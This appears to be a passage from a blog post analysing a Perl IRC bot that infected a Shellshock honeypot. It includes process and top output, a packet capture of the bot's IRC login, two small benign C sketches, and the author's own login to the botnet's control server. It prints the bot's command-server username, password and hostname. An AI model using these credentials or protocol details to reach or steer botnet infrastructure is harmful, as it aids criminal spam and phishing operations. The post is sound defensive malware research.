root@b0b6000146fa:~# ps aux |grep perl
root        31  0.0  0.0   8860   648 ?        S+   16:30   0:00 grep --color=auto perl
root@b0b6000146fa:~# ps aux |grep httpd
root        29  0.0  0.0  24516  3856 ?        S    16:30   0:00 /usr/sbin/httpd
root        33  0.0  0.0   8860   644 ?        S+   16:30   0:00 grep --color=auto httpd

If you check the CPU usage of processes, however, /usr/sbin/httpd sticks out like a sore thumb because it polls the server socket with no timeout after it connects. This spins the CPU (oops).
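For contrast, here is what a socket wait that does not spin looks like. The bot itself is Perl, so this C sketch is only an illustration of the general technique, with a hypothetical function name: let the kernel put the process to sleep until data arrives or a timeout expires.

```c
#include <assert.h>
#include <poll.h>
#include <unistd.h>

/*
 * Waits until fd is readable or timeout_ms elapses, then reads.
 * Returns the number of bytes read (0 on EOF), -1 on error,
 * or -2 if the timeout expired with nothing to read.
 */
long read_with_timeout(int fd, char *buf, size_t len, int timeout_ms)
{
    assert(buf != 0);
    struct pollfd pfd = { .fd = fd, .events = POLLIN };
    int ready = poll(&pfd, 1, timeout_ms);  /* sleeps in the kernel */
    if (ready < 0)
        return -1;
    if (ready == 0)
        return -2;
    return (long)read(fd, buf, len);
}
```

A loop built on a call like this uses almost no CPU while idle, so the process would not stand out in top the way this one does.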

# Output from top
  PID USER      PR  NI    VIRT    RES    SHR S   %CPU %MEM     TIME+    COMMAND
  8440 root     20   0   24984   3696    408 R   99.9  0.7     1921:38  /usr/sbin/httpd

I wanted to see what the program communicated to the server, so I put it in a Docker container and ran tcpdump. After it initially connected to the server, these messages were exchanged:

# Bot  (5.9.118.150 is wileful.com)
USER GNU 104.131.107.238 5.9.118.150 :GN
PASS swedenrocks
# Server
:Unreal.conf NOTICE AUTH :*** Looking up your hostname...
:Unreal.conf NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
:Unreal.conf 433 * GNU :Nickname is already in use.
# Bot
NICK GNU4387
# Server
PING :DEFB9868
# Bot
PONG :DEFB9868
# Server
:Unreal.conf 001 GNU4387 :Welcome to the XpowerHost IRC Network GNU4387!GNU@104.131.107.238
:Unreal.conf 002 GNU4387 :Your host is Unreal.conf, running version Unreal3.2.10.5
:Unreal.conf 003 GNU4387 :This server was created Mon Sep 28 2015 at 20:41:48 EDT

Some of you may immediately recognize this as IRC. This botnet seems kind of old school: no SSL and controlled over IRC.
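The PING and PONG exchange in the capture is the IRC keepalive: the client has to echo the server's token back or it gets disconnected. Here is a minimal sketch of that reply logic in C. The function name is hypothetical, and it assumes the line has already had its trailing CR LF stripped and carries no prefix.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/*
 * If line is an IRC PING, writes the matching PONG into out and
 * returns 1. Returns 0 for any other line or if out is too small.
 */
int irc_pong_reply(const char *line, char *out, size_t out_len)
{
    assert(line != 0 && out != 0);
    if (strncmp(line, "PING ", 5) != 0)
        return 0;
    /* Echo everything after "PING " back unchanged. */
    int n = snprintf(out, out_len, "PONG %s", line + 5);
    return n >= 0 && (size_t)n < out_len;
}
```

Given "PING :DEFB9868" from the capture, this produces "PONG :DEFB9868", which matches what the bot sent.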

Well it looks like I have a username, password, and server address. Why don't I try logging into the botnet with a regular IRC client?

I fired up another Docker instance, WeeChat, and a Tor proxy. After connecting to irc://GNU:swedenrocks@wileful.com:443, this is what I saw:

Connected to botnet

Wow, there's a total of 977 connected 'users' and 6 different channels. As seen from tcpdump, my bot was instructed to join channel #113 so I figured I would do the same:

Channel #113

Either all 932 clients in the channel are pretty unoriginal when coming up with a nick or the bots are assigned a nick formatted like GNU<ID>. Everyone is really shy too, because no one says anything. After idling in the channel for a few minutes, this is all to be seen:

Just leaving and joining

Looks like bots are actively leaving and joining. I suspect that the operators were moving the bots around or were continually exploiting Shellshock-vulnerable machines like my honey pot.

I wanted to see if I could send commands to the botnet since I had access to the channels, but after a couple of hours of unfurling the Perl script, I discovered that it authenticates commands based on the server name and nickname in the IRC message. I could not spoof this since it was something only an operator on the IRC network could do.

Back to the infected honey pot

I let my infected honey pot run for a few days and checked out the IRC transactions in the pcap logs. At intervals it would do the following:

  • Download a script to send emails with attachments.
  • Download a list of email addresses.
  • Run the script with the list of emails and possibly other files.

This is probably for phishing attacks or spam. I saw no DoS attacks.

Conclusion

I didn't want my honey pot to be contributing to illegal activities, so I shut it down.

It wasn't long before I couldn't log in to the IRC network on wileful.com.

No more access

At first I thought I got locked out, but after scanning it from multiple different IP addresses I never used before, it was still unresponsive. I suspect that the botnet moved to another server or stopped accepting new connections.

My setup for the honey pot and my results from this analysis can be found here. If you have any similar experience with this or know more, please send me a message. I'd like to learn more.
